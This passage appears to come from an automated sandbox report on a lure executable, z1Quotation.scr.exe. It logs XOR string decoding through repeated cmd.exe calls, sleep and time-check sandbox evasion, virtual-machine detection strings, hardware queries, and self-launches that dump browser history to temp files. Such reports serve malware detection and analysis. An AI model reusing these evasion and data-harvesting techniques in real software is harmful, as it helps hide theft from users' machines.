                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Windows\SysWOW64\dxdiag.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk Where DriveType=3
                Source: C:\Windows\SysWOW64\dxdiag.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe API/Special instruction interceptor: Address: 3556B09
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 137_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 137_2_0040DD85
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Window / User API: threadDelayed 9897
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe API coverage: 9.9 %
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe TID: 3672 Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe TID: 1992 Thread sleep time: -264000s >= -30000s
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe TID: 1992 Thread sleep time: -29691000s >= -30000s
                Source: C:\Windows\SysWOW64\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\SysWOW64\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\SysWOW64\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 140_2_00403A04 GetSystemTimeAsFileTime followed by cmp: cmp eax, 03h and CTI: jne 00403A46h 140_2_00403A04
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 140_2_00403A04 GetSystemTimeAsFileTime followed by cmp: cmp eax, 02h and CTI: jne 00403A59h 140_2_00403A04
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 140_2_00403A04 GetSystemTimeAsFileTime followed by cmp: cmp eax, 04h and CTI: jne 00403A82h 140_2_00403A04
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 140_2_00403A04 GetSystemTimeAsFileTime followed by cmp: cmp eax, 05h and CTI: jne 00403A97h 140_2_00403A04
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 0_2_00405B60 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405B60
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 0_2_00406731 FindFirstFileA,FindClose, 0_2_00406731
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 0_2_004027AF FindFirstFileA, 0_2_004027AF
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 137_2_0040AE51 FindFirstFileW,FindNextFileW, 137_2_0040AE51
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 138_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 138_2_00407EF8
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 139_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 139_2_00407898
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 140_2_004098C4 FindFirstFileW,FindNextFileW, 140_2_004098C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 146_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 146_2_00407898
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 137_2_00418981 memset,GetSystemInfo, 137_2_00418981
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe File opened: C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzq
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe File opened: C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzv
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe File opened: C:\Users\user\AppData\Local\Temp\hhsvynxt
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe File opened: C:\Users\user\
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe File opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe File opened: C:\Users\user\AppData\Local\
                Source: z1Quotation.scr.exe, 00000082.00000003.35991202437.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35979025881.0000000007422000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968794940.0000000007422000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35989039555.0000000007422000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968794940.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35959037232.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35959037232.0000000007422000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35979025881.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991202437.0000000007422000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121957679.0000000007422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: z1Quotation.scr.exe, 00000000.00000002.33494425602.00000000028EE000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000000.00000002.33495375188.0000000004E90000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: hgFs=
                Source: z1Quotation.scr.exe, 00000082.00000003.33237027260.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe API call chain: ExitProcess graph end node graph_0-5031
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe API call chain: ExitProcess graph end node graph_0-4864
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe API call chain: ExitProcess graph end node graph_138-34112
                Source: C:\Windows\SysWOW64\dxdiag.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 0_2_00403F44 SetWindowPos,ShowWindow,GetWindowLongA,ShowWindow,DestroyWindow,SetWindowLongA,GetDlgItem,SendMessageA,IsWindowEnabled,SendMessageA,GetDlgItem,LdrInitializeThunk,GetDlgItem,GetDlgItem,SetClassLongA,LdrInitializeThunk,SendMessageA,LdrInitializeThunk,LdrInitializeThunk,GetDlgItem,ShowWindow,KiUserCallbackDispatcher,EnableWindow,LdrInitializeThunk,GetSystemMenu,EnableMenuItem,SendMessageA,LdrInitializeThunk,SendMessageA,SendMessageA,lstrlenA,SetWindowTextA,DestroyWindow,CreateDialogParamA,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow, 0_2_00403F44
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 137_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 137_2_0040DD85
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Code function: 0_2_6D431B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_6D431B28
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process token adjusted: Debug

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Section loaded: NULL target: C:\Users\user\Desktop\z1Quotation.scr.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
